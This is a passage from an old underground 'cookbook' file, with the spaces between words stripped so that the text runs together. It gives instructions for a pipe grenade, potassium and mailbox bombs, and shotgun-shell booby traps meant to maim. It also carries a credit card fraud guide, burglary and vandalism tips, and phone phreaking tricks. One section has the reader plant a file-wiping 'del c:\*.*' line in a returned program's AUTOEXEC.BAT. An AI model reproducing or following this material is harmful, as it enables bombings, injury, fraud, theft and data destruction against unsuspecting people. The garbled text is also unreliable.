4. Asthewaterevaporates,themixturewillbecomethickeruntilitreaches theconsistencyofcookedbreakfastcerealorhomemadefudge.Atthisstageof thickness,removethebucketfromtheheatsource,andspreadthemassonthe metalsheet. 5. Whilethematerialcools,scoreitwithaspoonorspatulaincrisscrossed furrowsabout1inchapart. 6. Allowthematerialtodry,preferablyinthesun.Asitdries,restoreit accordingly(aboutevery20minutes)toaiddrying. 7. Whenthematerialhasdriedtoapointwhereitismoistandsoftbutnot stickytothetouch,placeasmallspoonfulonthescreen.Rubthematerialback andforthagainstthescreenmeshwithspoonorotherflatobjectuntilthe materialisgranulatedintosmallwormlikeparticles. 8. Aftergranulation,returnthematerialtothesuntoallowtodry completely. 165.PipeHandGrenadebytheJollyRoger HandGrenadescanbemadefromapieceofironpipe.Thefillercanbeof plasticorgranularmilitaryexplosive,improvisedexplosive,orpropellant fromshotgunorsmallarmsammunition. MaterialRequired: IronPipe,threadedends,1"to3"diameter,3"to8"long. Two(2)ironpipecaps Explosiveorpropellant

Nonelectricblastingcap(Commercialormilitary) Fusecord HandDrill Pliers

Procedure: 1. Placeblastingcapononeendoffusecordandcrimpwithpliers. NOTE:Tofindouthowlongthefusecordshouldbe,checkthetimeit takesaknownlengthtoburn.If12inchesburnsin30seconds,a6inchcord willignitethegrenadein15seconds. 2. Screwpipecaptooneendofthepipe.Placefusecordwithblastingcap intotheoppositeendsothattheblastingcapisnearthecenterofthepipe. NOTE:Ifplasticexplosiveistobeused,fillpipeBEFOREinserting blastingcap.Pusharoundstickintothecenteroftheexplosivetomakeahole andtheninserttheblastingcap. 3. Pourexplosiveorpropellantintopipealittlebitatatime.Tapthe baseofthepipefrequentlytosettlefiller. 4. Drillaholeinthecenteroftheunassembledpipecaplargeenoughfor thefusecordtopassthrough. 5. Wipepipethreadstoremoveanyfillermaterial.Slidethedrilledpipe capoverthefuseandscrewhandtightontothepipe. 166.EuropeanCreditCardFraudbyCreditman! UKcreditcardfraudisaloteasierthanoverintheStates.Thesamebasic3 essentialsareneeded: 1. 2. 3. Asafehouse. CreditcardnumberswithExp.dateandaddress. Goodsuppliersofnextdaydeliverygoods.

TheSafehouse Thesafehouseshouldbeonthegroundfloor,soasnottopissoffthedelivery manwhenhecomestodropoffyourfreshlystolengear.Ifhehastogoup10 flightsinacompletediveandsome14yearoldkidsignsforanA2000thenhe's gonnawonder!Makesuretherearenonosyneighbors,agoodareaisonefullof yuppies'costheyallgotoworkduringdaytime.Safehousesareusuallyobtained bypayingamonth'srentinadvanceorputtingdownadepositofsay,$200. Eitherthatorbreakintoaplaceandusethat. CreditCardNumbers Thecardnumber,expirydate,startdate(ifpossible),fullname(including middleinitial),phonenumberandfulladdresswithpostcodeareideal.Ifyou canonlygetthesirname,andnopostcode,youshouldn'thaveanyrealhassle. Justsayyoumovedrecentlytoyournewaddress.Phonenumberishandy,ifit justringsandringsbutifitdoesn't,thenmakesureit'sexdirectory.You CANNOTgetawaywithgivingthemabullshitphonenumber.Somefussycompanies wantphonenumbersjusttocrosscheckonCARDNETbutgenerallyit'snotneeded. Torecap,here'saquickchecklist: 1. 2. 3. 4. 5. 6. Cardnumberandexpirydate. Nameandaddressofcardholder. Firstname/initials(OPTIONAL) Startdate(OPTIONAL) Postcode(OPTIONAL) Phonenumber(OPTIONAL)

Ifyouhaveall6,thenyoushouldn'thaveanyhassle.Startdateistherarest itemyoucouldbeaskedfor,postcodeandinitialsbeingmorecommon.Ifyouare missing36thenyouneedonehelluvasmoothtalkingbastardonthephone line!!!! TheOrdering Noteveryonecanorder$1000'sofstuffit'snoteasy.Youhavetobecool, smoothandhavesomegoodanswerstotheirquestions.Iadvisethatyouonly orderupto$500worthofstuffinonego,butifyouhavedetails16andthe phonenumberwillNOTbeansweredfrom9to5.30P.M.thengoupto$1000(make sureit'saGOLDcard!).Whengettingreadytoordermakesureyouhaveat least3timestheamountofsuppliersyouneede.g.ifyouwanttocard5hard drives,makesureyouhave15suppliers.Alotofthetime,theyareeitherout stock,can'tdonextdaydeliveryorwon'tdelivertoadifferentaddress.Quick checklistofwhatyoumustaskbeforehandingovernumber: 1. 2. 3. Nextdaydelivery,OK? Orderedtodifferentaddresstocard,OK? Doyouhaveiteminstock(prettyobvious,eh?)

MakesureyouaskALLofthesequestionsbeforehandingoveryourprecious number. Excuses Usualexcusesforadifferentaddressarethatit'sapresentoryou'reon businesshereforthenext5weeksetc.Anyoldbullshitwhyitwon'tgotothe properaddress. WARNING!Invoices!WARNING! Invoicesaresometimessentoutwiththeactualparcelbuttheyarealsosent outtothecardowners(whydoyouthinktheyneedtheaddressfor?)sousinga safehouseformorethan2daysisrisky.A1dayshotissafe,iftheycatchon thenthey'llstopthegoodsbeforegettingasearchwarrant. CreditLimits Limitsoncardsreachfrom$500to$4000onGoldcards.Youraveragecardwill beabout$1000$1500.Ittakesawhiletobuildupagoodcreditratinginorder tohavelargelimitssodon'tthinkeverycardwillhold12IBM386's!Visaand AccessarealwaysusedAmericanExpressetc.areUSELESS. Access=Eurocard,Mastercard(beginswith5) Visa=(beginswith4,16digitisaGold)

Ageneralruleis,alwaysconfirmanordertomakesurecreditiscleared.As themonthgoeson,creditisusedupthebadtimesarefrom27th3rdwhich iswhenallthebillscomein.Besttimetocardisaround11thor12th,when thepoorguyhaspaidoffhislastbillsoyoucanrunupanewone(he,he, he!). Idealitemstocard Thebeststuffisalwayscomputerhardwareasit'snextday.Amigas,ST's,PC's anythingreally.Blankdiscsareawasteoftime,they'retooheavy.External drives,monitorsgoodstuffbasically.Don'torderanyshitlikeVCR's,HiFi, videocameras,musickeyboards,computersoftware,jewerelyoranythingunder $300.You'llfindthelisteditemsaredifficulttogetnextdaydeliveryand usuallywon'tdelivertoadifferentaddressbastards,eh?You'rewasting yourtimewithlittleitemsunder$300,trytokeepdeliveriesunder10aday. ThedropTwowaysofdoingthedrop 1. 2. Signforallthegear(makesureyou'retherebetween9.00and5.30P.M.) Don'tturnuptillaround6.30P.M.andcollectallthecardsthatthe

deliverymanhasleft.Theseusuallysay'youwereoutatXXtimesocouldyou pleasearrangenewtimefordeliveryorpickupfromourdepot'.Inthatcase, pissofftothedepotandgetallthegear(needabigcar!). Remember,cardingisILLEGALkiddies,sodon'tgetcaught. 167.PotassiumBombbyExodus Thisisoneofmyfavorites.Thiscreatesaveryunstableexplosiveinavery stablecontainer.Youwillneed: 1. Atwoendedbottle.Thesearekindahardtofind,youhavetolookaround, butifyoucantfindone,youwillneedasimilarcontainerinwhichthereare twototallyseparatesidesthatareairtightandaccessibleattheends,like this: !airtightseparator! ________________!_________________ ||| /|\ | |c|||c| |a|||a| |___p|||__p_| \|/ ||| | theseparatorMUSTremainairtight/watertightsothisdoesn'tblowoff yourarmintheprocess(Believeme.Itwillifyouarenotexact.) 2. Purepotassium.NotSaltPeter,oranyshitlikethat.Thismustbethe pureelement.Thisagainmayprovehardtofind.Tryaschoolchemistryteacher. Tellheryouneeditforaproject,orsomeshitlikethat.Trytogetthe biggestpieceyoucan,becausethisworksbestifitasolidchuck,nota powder.YoucanalsotryEdmundScientificCo.at: Dept.11A6 C929EdscorpBldg. Barrington,NJ08007 orcall1(609)5478880 3. 4. Cotton Water

Instructions: Takethecottonandstuffsomeintooneendofthecontainerliningonesideof theseparator.Placesomepotassium,aboutthesizeofaquarterorbigger (CAREFULLY,andmakesureyourhandsarePERFECTLYDRY,thisstuffreactsVERY VIOLENTLYwithwater)intothatsideandpackitintightlywithallthecotton youcanfit.NowscrewthecaponTIGHTLY. Ontheothersideoftheseparator,fillitwithasmuchwateraswillfit,and screwthatcaponTIGHTLY.Youarenowinpossessionofacompactexplosive madesomewhatstable.Toexplode,throwitatsomething!Thewaterwillreact withthepotassium,andBBBOOOOOOMMMM!!!Worksgreatonwindowsorwindshields, becausetheglassfragmentsgoeverywhere(standback)andripstuffapart.The biggerthepiece,thebiggertheboom.Ifnopotassiumcanbefound,trylooking forPURESodium,itworkswelltoo.

PS:Youcouldalsoplacethislittlesuckerunderthewheelofacarofsomeone youhate...(Waittill'theybackoverthatone!!!) 168.YourLegalRightsbyExodus Becauseyoupossessthislittlecollectionofmostlyillegalconcepts,you shouldbeawareofyourlegalrightsIFarrested(hey,ithappenstotheworst ofus). YourLegalRightsare: 1. Haveahearingbeforeamagistrateorjudge,assoonaspossibleafteryou arearrested. 2. Benotifiedofthechargesagainstyou. 3. Haveareasonablebailset,ifbailisgranted. 4. HaveaFAIR,IMPARTIALtrialbyjury. 5. Bepresentatallstagesofthetrial. 6. Confrontyouraccusers.(withoutthebaseballbat) 7. Haveyourlawyercrossexaminethewitnesses. 8. Haveyourlawyercallonwitnessesonyourbehalf. 9. Betriedforacrimeonlyonce. 10. Receiveneithercruelnorunusualpunishmentifyouareconvictedofa crimeandsentenced. NOTE!!!:Theserightsareforafteryouarearrested,anddonotincludethe readingoftherights,etc.IftheserightsareviolatedinANYway,thatmay becauseforamistrial,oreventotalrelease. 169.HowTheLawProtectsJuvenileOffendersbyExodus Juvenilesaccusedofbreakingthelawaregrantedsomespecialrightsintended toprotectthe,becauseoftheirage.Ifajuvenileischargedwithacrime punishablebyaterminareformschoolorjuveniledetentionfacility,heis assuredtherightto: 1. Remainsilent,andnotincriminatehimself/herself. 2. Beplacedinquartersseparatefromadultoffenderswhilebeingheldin custody. 3. Benotifiedbeforeahearingofthechargesagainsthim. 4. Bereleasedtohisparentsorguardiansaftersigningawrittenpromiseto appearathistrial(unlessthechildislikelytorunawayandnotcomebackto courtunlessheisdangerousormayhimselfbeindangerifsentbackhome). 5. Betriedatproceedingsthatareclosedtothepublic. 6. Havearecordoftheproceedingsmade,incaseoneisneededforafuture appeal. 7. Berepresentedbyalawyer. 8. Havealawyerappointedbythecourtifhecannotaffordone. 9. Confronthisaccusers. 10. Havehislawyercrossexaminewitnesses. Again,theserightsareforafteryouhavebeenarrested. 170.DowntheRoad'MissilebyExodus Thismissileisaptlynamedbecauseittravelsbestdownastreetorroad.This isnothingmorethatharmlessphunintendedtoscarethelivingshitoutof oncomingcars. HowToMakeAMissile

Allyouneedare: Hairspraycan,orsomethingelsewithflammablepropellant(don'tuse spraypaintdipshit,itmakesabigmess!) bookofordinarymatches tape(clearifpossible,itsthinner) BBorpelletgun(useBB'sifpossible) Instructions: Tapethebookofmatchestothebottomofthecan,y'know,theCONCAVEpart.You mightwanttoarrangethematchessothattheyarespreadoverawideareaof thebottomofthecan,butclosetogether. Shakethecanupvigorously.Nowplacethecanonitssidewiththenozzleof thecanpointedinthedirectionyouwantittogo,downaroad,offaramp,at yoursister,etc..Nowstandbackabit,andshootatthematches.Itshould takeoffatabout30ftpersec!!Whathappensincaseyoucouldn'ttell,is theBBhitsthematchesandcausesaspark,andatroughlythesametime, puncturestheweakbottomofthecan.Asthepropellantspraysout,it hopefullycomesincontactwiththespark,andpresto.Ifyoudon'tdoitright you'llblowalotofmoneybecauseeachcanonlybeusedonce,soexperimentto findbestresults. InTheAirMissile: Compiletherocketasstatedbefore,andputitverticalonastandofsomesort withthebottomaccessible.PlaceasectionofPVCpipe95preferredandshoot intothePVCpipewhichshoulddirecttheBBupward,andthecanshouldtake off.Experimentw/differentcans,itshardtofindonesthatworkperfectly, andstillgohigherthan30ft. 171.PhunWithShotgunShellsbyExodus Thisphileisforthosehavenoconcernforthemselvesorthepersontheywanna fuckoverwiththis.(inshort,afuckingMANIAC!!!) DoorBlams Shotgunshellsarewonderful.Theycanbeusedinalmostanysituationwhere painoramputationoflimbsisconcerned(includingyourownifyouarenot EXTREMELYcareful.Thebestwaytouseshells,istheDoorBlam.TheDoorBlamis asimpleconcoctionofashelltapedtothebackofadoorwiththeignition buttonfacingawayfromthedoor(soitblowsoutagainstthedoor).Now positionitsomewherewhereitwilldothedamageyouwant.i.e.nearthetop fordecapitation,middleforslowdeath,orlowtomakethevictimskneecapsfly acrosstheroom.Nowtapeathumbtackagainstawallorsomethingthatthat partofthedoorbumpsupagainst.Tapeittothewallsothatthepointpokes throughthetape,andpositionitsoitwillhittheignitebuttonupon impact...Itsthatsimple.Instantpain! LongRangeExplosives TheseareTHEmostdifficultexplosiveIhaveevertriedtomake(peopleIknow havelostfingersandhandstothislittlefucker)IFyouhaveaVVVVERYstill hand,itmightbeaccomplished.Ignitebuttonsusuallytakesomeforcetomake itblow,soCAREFULLY&LIGHTLYpushatackthroughtapeandtapeittotheback oftheshell,withthetipofthetackLIGHTLYtouchingthebutton.Addmore tapetothebacktoholdthepininplace.Ifyoustillhavehandsatthis point,consideryourselflucky.Nowyouneedtoaddaweighttothetackend parttomakesureithitsthegroundfirst.Tapingsmallrocksormakingthe shellbyputtingheavyloadstowardsthebuttonhelps.Placingacracker(yesa

cracker(Saltines,anyone?))betweenthetackpointandthebuttonhelps preventdetonationuponTHROWING,whichDOEShappen.Nowtossituphighand AWAYfromyou,andRUNLIKESHITdoesafteryoueatMexican. 172.ElectronicAccessoriesbyExodus Somephreaksbelieveinthedownndirtycustomizingofequipmentbycraftingit themselves...notme!Ibelievethattheotherguyshouldbuildthestuff,and I'llstealitanduseitlater.Thisisalistofplaceswhereonecanobtain thedevicesthatwouldotherwisehavetobebuiltbyhand.Butafterall,a goodphreakcantakeapremadeitemandadaptittohisneeds..... RadarJammers: The"Eclipse"$199.00 T.E.K.Distributors POBox32287 Fridley,MN55432(612)7831666 Surveillance: fonebugging,fonerecordingsys.,etc... EDEcatalog$5 POBox337 Buffalo,NY14226(716)6913476 USICorp.,catalog:$2 POBoxPM2052 Melbourne,FL32902(407)7251000 Protectorcatalog$5 POBox520294M SaltLakeCity,UT84152(801)4873823 FREEcatalog:18007325000 SpyMartcatalog$4 POBox340M MoreheadCity,NC28557 MICROVIDEO: SUPERCIRCUITScatalog$3 13552ResearchBlvd.#B2 Austin,TX78750 Scanners: CRBFREEcatalog POBox56 Commack,NY11725 HPR POBox19224PM Denver,CO80219 (requestinformation,Iguess!?) MISC: INFORMATIONUNLIMITED<<<REALLYCOOLSHIT,THEGOODSTUFF. POBox716,Dept.PM294(kindaexpensive,sogetreadyto Amherst,NH03031CARD!!)

FREEcatalog(w/order,otherwise$1.00) EDMUNDSCIENTIFIC(alwaysafuckingGREATplacetofindthelittle Dept.14D2,nittygrittyelectronicsthatmakeup C908EdsCorpBldg.coloredboxes,andthelike) Barrington,NJ08007 173.DripTimerbyExodus Anothermethodoftimedelayforexplosivesthataredetonatedbyelectric means,isthedriptimer.Filla'baggy'withwaterandthenaddasmuchsaltas thewaterwillhold.Sealit,leavingsomeairinside.Then,tapethetwo contactwiresfromwhichthecircuithasbeenbroken,totheinsideofalarge cup.Placethebaggyonthecup.Pokeaholeinthetopofthe'baggy',where thereisair,andthenmakeaholeinthebottomtoletthewaterdrainintothe cup.AsanyEinsteinfigures,thesaltwaterlevelinthecupwilleventually conductelectricityatthemomentbothwirestouchwater,thuscompletingthe circuit.Ihaveyettotrythistimerout,andIgottheplansfromatotal idiot,phreakernonetheless,anddoubtitwouldworkwithanypowersourceunder 12v. 174.StealingbyExodus Itisstrangejusthowmanyfilesthereareouttherethattrytodocumentthe artofstealing.Afterall,itISanart.Youhavetobecalm,smooth, persistent,patient.Stealingisnotanovernightplannedoperation.Youshould trytoprepareforatleastaweekormorewhenplanningtostealfromahouse, andevenLONGERwhenfromabusiness.Storytime,kiddies: Alongtimeago,well,inthepastyear,myfriendsandInoticedthatthe buildingcomplexinourtownwastheperfectplacetoobtainunpaidforitems. Welearnedallwecouldaboutthecomplex,whichwasabout365,000sqft,and eachcompanyconsistedofanoffice(fullyfurnishedwithcoolcomputerstuff), anda10,000sqft(roughly)warehouse,allinterconnected,andallonelevel. Thisinformationwasobtainedthroughseveralcallstothetowncommittee(board ofdevelopment,orsomeshitlikethat,theplacethatyoucallforbuilding permits,andthelike.),andweobtainedtheblueprintsforthewholecomplex. Weplannedaroutefromthesideentrancethroughthewarehouse,andintothe offices,whereallthegoodstuffisusuallylocated.Nowthatwehadourroute, allweneededwasaplantogetinside.Sincethiswasourfirstmajorjob,we spentafewgoodweeksonpreparation.Duringthesnowweather,weworkedw/a companytoshovelthesidewalksofthecomplex.Onenight,atabout11PM,we stoppedshovelinginfrontofourplannedjobsite,Campbell'sSoup,Co.There wasnobodythereexceptthejanitorsthatcleaneduptheplace(orsowe thought).IaskedthejanitorifIcouldusethebathroom(Ididhavetogotoo) andheletmein.ImusthavesurprisedhimwhenIknewexactlywherethe bathroomwas!AsIwalkedtoit,Iscannedforvideocams,infrared guns/receivers(littleboxesatentranceswithablackglasssquareabout1"sq. ataboutkneeheightoneachside).Nothing.Thedoorsallhadsecuritymagnetic detectionatthetops,andalsothewindows.Tothinksomeonewouldbreakin throughanobviousplacelikealargewindow,stupid.Tomysurprise,therewere afewlosersworkinglate,anddidn'treallycarethatIwasthereatall.Take anotherViverin'guys,Iwon'tbeherelong.Thesmellofblackcoffeewas stifling.Thebathroomwaslocatedbackbytheoffice'sentrancetothe warehouse,andtomysurprise,itwasunlocked!Thelightswereon,andthe placewastotallyempty,exceptforafewcardboardremains,andshelves,and thatblessedsidedoor.Iwalkedovertothedoortoexamineit.Nosecurity,no videocamsinthewarehouse,nonothing.Odd,usuallythesewarehouseswerekept tightasahookerspussy.Butitlookedliketheywerepackinguptomove somewhere.Boxesontheofficedesks,etc..Thedoorwaslockedwithakey

deadbolt(paintopick)andaregulardoorknobkeylock.Noproblem.Ineeded tostopthatdeadboltfrombeinglocked,soIlookedaroundforsomethingto use....aha!Therewassomestrangemateriallikealum.foilontheground, pliable,yetofablackcolor.Itookoutasmallallenkey(athiefnevergoes ANYWHEREwithoutasmalllockpickingtool)andcrammedenoughofthestuffinto thekeyholesothatakeycouldnotbeinsertedfarenoughtoturn,andthe stuffwasintofartobepulledout.Viola!Backtothepointofthisstory. Whenthetimecametomakeourmove,somethingstrangehappened.Theplacewas abandonedfor3daysstraight,mostofficeequipmentremoved,andthefrontdoor leftajar,forall3days.Westilldecidedtoenterviaourplannedroute.At 1:30AMwewenttothesidedoor,andwhatasurprise,thedeadboltlockwas open.Nowtotheknoblock.Itwasstilllocked,butnotaproblem.Knoblocks usuallylooklikethis: |wallsocket> |) d| o|| o|) r|) |) | |wallsocket> Thetopslidingpieceisabout"wideonpopularlocks,withthebarfacing you,ifthedoorswingsoutward.Withthesmallestallenkeyyoucanget,stick itinandrepetitivelypushandslideitbacktowardstheknob,butdon'tlet go,becauseitisspringloadedandwillsnapbackintoplaceagain.Nowforthe largerbar.Takeanotherkeyandwedgeitintotheslotwherethebarentersthe otherwall(withouttheknobonit)!anddothesamething.Thiswillbe considerablyhardertodothanwiththesmalltongue,butifyoupracticedlike youshouldhave,itwillopenwithminimumeffort.Nowwewereinside.Weran throughthewarehousethoughthewarehouse/officedoor(thesearerarelylocked, buttrytoprepareforitaheadoftimeby"crammingthelock"likeIdid)and intotheoffice.Theplacewasempty,noshelves,justdesks,chairs,andboxes. Theboxescontainedmodems,motherboards,buscards,printers,cables,fone cable,andonecontainedaZenithlaptopcomputer!Noshit,thisisatrue story!Wetookeverythingwecouldcarry(5people).Wetookalltheabove mentioned,aswellasprintertoner,fones,fonejacks,documents,deskchairs, insulatedboxesandbags(staticfreekind),eventhelittleshitthings,like outletplates,lightbulbs,ANYTHING!!!Wewentreallycrazy,andwereoutin2 min30sec.(alwayssetatimelimit) Wewoundupthrowinghalftheshitaway,butitfeltgreatjusttotakeanything thatwasnotours!!Ihavesincethendoneother"jobs"withmuchmore precision,andeffort,aswellasbetterrewards.Herearesometipsthatshould befollowedwhenattemptingtosteal: WEARGLOVES!!!!!!!!!! Backpacksforeveryonetoputthelootin.

Alwayscasethejointforatleastaweekandkeepdocumentedrecordsof wholeaveswhen,whattimeitcloses,timedlights,etc... Haveatleast4phriendswithyou,and,please,makesuretheyknowwhat theyaredoing,noidiotsallowed!

Bringtools:smallallenkeys,bothtypesofscrewdrivers,standardsize, andtiny,hacksawblade,wirecuttersandstrippers,spraypainttoleaveyour handleonthewall,hammer,mace,gunifavailable,flashlights(duh),wiregood forreroutingdoorsecurity,andboltcutters. DesignateapersontocarryallthetoolsONLYdon'thavehimpickupstuff andmixitwiththetools,thiswillonlyslowyoudownlaterifyouneedto lookfiratoolquickly. DesignateapersontoSTAYPUTbythedoorandkeepwatch. Designateatimer,onewhohasalightedstopwatch.

MakerunsNOLONGERTHAT3MIN.EVENTHISTIMEISEXTREMELYHIGHTRYTO KEEPASLOWASPOSSIBLE. Getawayvehicle(preferablyNOTavanorpickuptruck,thesewillbevery suspicioustothepigs..er.Imeancops.Anddon'tspeed,oranything,thisjust attractsattention.Coverlicenseplatestilljustbeforeyougetyourasses going,sonoonecanreporttheplatestothepigs..oops!,damn,diditagain, cops.Makesureyouremovecoveringbeforeleaving. AlwayskeepflashlightspointedDOWNunlessnecessary,crawlunder windows,noshouting,evenifyoufindsomephuckingcoolshit,onsecond thought,maybepaintingyourhandleisalittlestupid,soforgetthat,wear darkclothesOVERregular,nonsuspiciousclothes(getchangedfirstthingin thecar) Neverbragaboutyourfindingsinpublic,onlyonmodem,oronBBS,and nevergivenamesofplaces,phriends,andexactnamesofthingstaken,(justsay you'borrowed'a486DX33motherboard,don'tsayisaIntel486DX33MHzforan IBMPS/1model50,serial#XXXXXXXXXXXX.thatisjustplaindumb) Havephun!!andneverstealfromyourneighborhood.

Ifyoubreakintohouses,nevermovestuffaround;thelongerittakesthe yuppiefamilytorealizethatyouwerethere,thebetter. WEARGLOVES!!!!!!!!!!!!!

Togetinwindows:shootwindowwithBBgun,andplaceclear,stickyhard coverbookcoveringonthewindowoverthehole,hopefullytheimpactofthe shotwasenoughtocracktheglass,andLEANORPUSHonthecoveredglass,do nothitorkick,andyouwillseethatthemajorityoftheglasswillstickto thecovering,andwillmakeconsiderablylessnoise. Enterthroughbasementwindowspreferablyunderadeckorsteps.

MAKESURETHEPEOPLEWILLBEGONEFORTHENIGHTANDTHENEIGHBORSARE ASLEEP(GOFORAROUND2:30AM) Takestuffthatwillselleasilytofriends,anddon'twastetimetaking thingsthatlookneat,justtakethebasics:electronic,computer,TV,VCR,some jewelrythingsyoucouldeasilyhock,preferablywithoutinscriptions,raidthe fridge,takegoodqualityfones,stereoequip.,speakers,etc.. Alwayscasetheoutsideofthehouselookingforsecuritystickersthat yuppiefamiliesliketoplaceinfullview. Domischievousshitlikecutallfonelinesinhouse,cutupcouch cushions,andflipthemoversotheylookperfectlynormal!;shootaholein theirfishtank,(allyuppiesownfish);slashclothes,thenputthembackinto

thedrawer;unplugfridge;setthermostatwayupto99.9;leavedrainplugged andletthefaucetrunjustalittle,(for6hours!!);whateveryoucan'ttake orcarryout,destroyinasubtleway,ifyoucan'tcarryoutthose130lb. woodcasestereospeakers,slashthecones;breakballpointpensopenandrub themintothecarpetwiththeirshoes;runamagnetoveraudioandVCRcassettes andfloppies,andanythingelsesubtlethatwouldbrightentheirday. 175.MISCELLANEOUSINFORMATIONbyExodus Easyexplosive: FillKodakfilmcase(y'know,theblackcylinderwiththegraycap)with explosiveofyourchoice.Drillholeingraylid,insertfuse,andtapeitback togetherverytightly.Light. or Pokeaholeitthegraycapfacingoutwards,andinsertanM80withfuse goingthroughtheholeandreseal,tapingittightlyALLAROUNDthecase.Place inplasticmailbox,light,closedoor,andgetthehellaway!Becauseofthe tightairspace,thedestructivepoweroftheexplosionisincreased5X.Works underwatertoo,withadropofwax,orpreferablyrubbercementaroundwhere thecapandwickmeet. and FillaGLASScoke/pepsibottlewith1partgas,1partsugar,&1part water.WedgeanM80intothetopabouthalfway.Shakethecontainer,placein mailbox(hopefullywithmail{hehe!})light,andgetthefuckaway.Thisthing sendsglassshrapnelEVERYWHERE,includingthroughtheirmail. DoorknobShocker: Runawirefromoneslotinwalloutlettothebracketinthewallthat theknob'stongueinsertsinto.Runanotherwirefromtheotherslottoan inconspicuousspotontheDOORKNOB.Howdoesthatone*grab*you? PhoneLoops:(remember,tone+silence=connection) NUMBER|Tone/Silence(T/S)End|STATUS(onconnection) ???????????Snomatch 16197480002Tdefinitetone xxxx749xxxxTdefinitetone ???????????Snomatch 16197390002Tdefinitetone xxxxxxxxxx1Snotsureofmatch xxxx7380002Tdefinite xxxxxxx0020Sdefinite xxxx7xx0002Tdefinite ???????????Snomatch Actually,any16197x9000xgivestonedetect,findingtheothersilent connectionisaweebitharder. Ifanyonemanagestocompletesomeofthese,oranyloops,pleaseletmeknow.

Theonlybadthingaboutlooplines,isthateventuallytheGestapofindsout abouttheoveruseoftheline,andassignsthenumbertoanyonewhowantsanew numberfortheirfone.Thenwhenphreaksbegintousethelineagain,thinking itisaloop,theygetapissedoffyuppiewhothenhasthecalltraced,and that'slikeputtingyourballsrightinadoorandslammingit.Theoperator willcomplaininyourface,andsaysomebullshitlikeshehasyournumberand willreportanydisturbancestothefoneco.ifsheseesitagain.

SimpleVirus/EasyWayToReturnACopiedProgram(hehe!) Whenyoubuyagame,orsomethingfromacomputerstore,copyit,andwantto returnit(Iknowallofyoudothis),sometimesallthestoredoesisre cellophaneitanditgoesbackontheshelveswithoutbeingretested.Ifthe originalfloppieshaveanAUTOEXEC.BATfileonthemtoinitiatethe copying/decompressionatbootup,simplyeditittosay: cd\ delc:*.* y That'llmakesomeone'sdayrealfunny,especiallyifthestoretriestotestit. Or,inmostcasesthestorewillnotacceptreturnedmerchandiseifitisnot defective,soDEFECTIT.Thisisdonebyusingaprogramthatshowsthedateand timetheoriginalswerelastmodified(checkforthisBEFOREinstallingthe program!!!!!!)suchasDosShell,orXTGold.Thensetthedateandtimeonyour computertomatchtheoriginalsdateandtime(approx).Installtheprogram, and/orcopytheoriginalsandmanuals.Nowfuckaroundwiththedecompression file(usuallyPKUNZIP),theinstallationfile,andanyothersyousee.Nowthe storehasnoreason,andMUSTaccepttheproductasareturn,orsometimesthey willgiveyouareturncheckforthe$$,andsendtheprogrambacktothe manufacturer,whichisgood,becauseitwillthenberecopied,resealed,andput backontheshelvessomewhereforanotherphreakertoHACK!! (Iftheabovedate/timematchingistoomuchofapainforthereallyretarded outthere,setyourcomputerdate/timetoanypastonesclosetotheoriginals, andfuckwithALLthefiles,thusmakingthemallmatch.) BatteryBombs: BatterieslikeDuracell,Eveready,Energizer,etc...arespeciallymadeforhome useandwillnotunderanycondition,explodewhensimplyconnectedtoeach other.Therefore,genericbatteriesarerequired.Thesebatteriescanbe obtainedinhickcountry,orfromashittywholesaler.I'veheardofphriends putting9Vsinthefuckingmicrowaveforaminuteorso,andthisissupposedto disablethe"exploderprotector",butanyonewhoputsbatteriesinamicrowave, shouldhavethebatteriesexplodeonthem.Ineverfoundoutif29vbatts connectedreallydoexplode.Ihopeso. AnyBlueBoxers?? Notmanypeopleuseblueboxesthesedays.They'vebecomeaneminentdangerto phreakers.MaBellhasnewequipmenttodetecttheuseoftoneemittingboxes, andabouttheonlysafeplacetoboxcallsfromisthehandydandypayphoneat theendoftheblock.Theonlywaytoboxcallstodayistoswitchoffto anotherswitchingsystemwithanothernumber:i.e. CallastorelikeToys'R'Us,(19083226065Livingston,NJ)andaskforthe

technical(videogame)department.Thisswitchesthenumberfromtheaboveto theextensionofthedepartment,usuallyandextension,butitcanbeatotally different#youaresenttowhileyouareonhold.ThisisVERYgood.Bullshit theemployeeatthetechdept.,andwaitforHIMtohangupfirst.That disconnectsyoufromhisdepartment,butnotfromtheinterconnectionsofthe store.(Itmightevenbepossibletodialanumberandgetanotherdepartmentat thispoint).Thisislike'stacking'trunks.Theirdialtone(insidethestore) mayhaveaslightlyhigher/lowerpitchthanadialtoneatyourhouse.Thisis whatyouwant.Now,blow2600acrosstheline,andyoushouldhaveaccesstoa trunk,andBellLabsthinkthatthestoredidit,anditisnotusually questionedbecausethecomputermightthinkthatitispartoftheirpaging system.(not100%sure,testaround) Whensomeone(preferablywhoyoudon'tgiveashitabout)calls,dial*69to ringhimback(Ifyourareasubscribestothisfeature).Whatshouldhappenis thatthe*69toneaskstheBellcomputertocallbacktheperson.TheCOMPUTER doesthecallingatthispoint.Nowwhenyourfriendpicksup,bullshithiminto hangingupfirst.Nowthecomputerisgettingthedialtonefirst,thenitpasses itontoyou.Ifyoublow2600atthispoint,thecomputermaythinkitisits ownequipmentdoingthecalling.I'mREALLYnotsureaboutthisone.Hopefully thisoneworks,butIcan'ttestitbecausesomefuckedup,shitfull,douche nozzle,pigfuckerbrokemyMFbox.MFboxesarenotthathardtocomeby.Many hobbyshops,musicinstrumentstores,orelectronicstoresmayselltheMFbox itself,oronethatdetectstones,whichcanbeusedinthereverseway. GoodTechnicalPhoneNumbers: Sometimesthehardestpartofgettingtechnicalsupportisfindingaplaceto look.AneasyplaceisMIT(HOMEOFTHEORIGINALPHREAKS)Findthenumberfor theElectronicengineeringcampus,callandsayyouwouldlikethenumberfor (giveroom#makeoneupifyouhaveto),orcallthepersoninchargeofdorm assignments(buyacollegebookifyouneedto).Eventually,ifdoneright,you willhavealistofpossible#s,andsetyourmodemonscan,andlookfor carrierdetect.Oneofthesenerds...ahm!ImeanGeniusesmusthaveacomputer withamodem,andtheseguyswillanswerabout100%ofyourtechnicalproblems.

PracticalJokes: IfyouareintopracticaljokeslikeIam,thanhereisabookforyou: "TheSecondOfficialHandbookofPracticalJokes" by:PeterVanDerLinden Therearehundredsofgoodpracticaljokesandphonescams,aswellasasection ofcomputerjokes,withawholeprogramofrewritingtheCOMMAND.COMfiletobe funnierthanever. 176.ShavingCreamBombbyExodus Thismaynotreallybewhatwewouldconsiderabomb,butitisahelluvagreat ideatophucksomeoneover.Youwillneed: (1)Personyouhatewhohasacar.

(1)Containerofliquidnitrogen(tryascienceshop,orEdmund Scientific,mentionedinseveralplacesinthisCookbook)

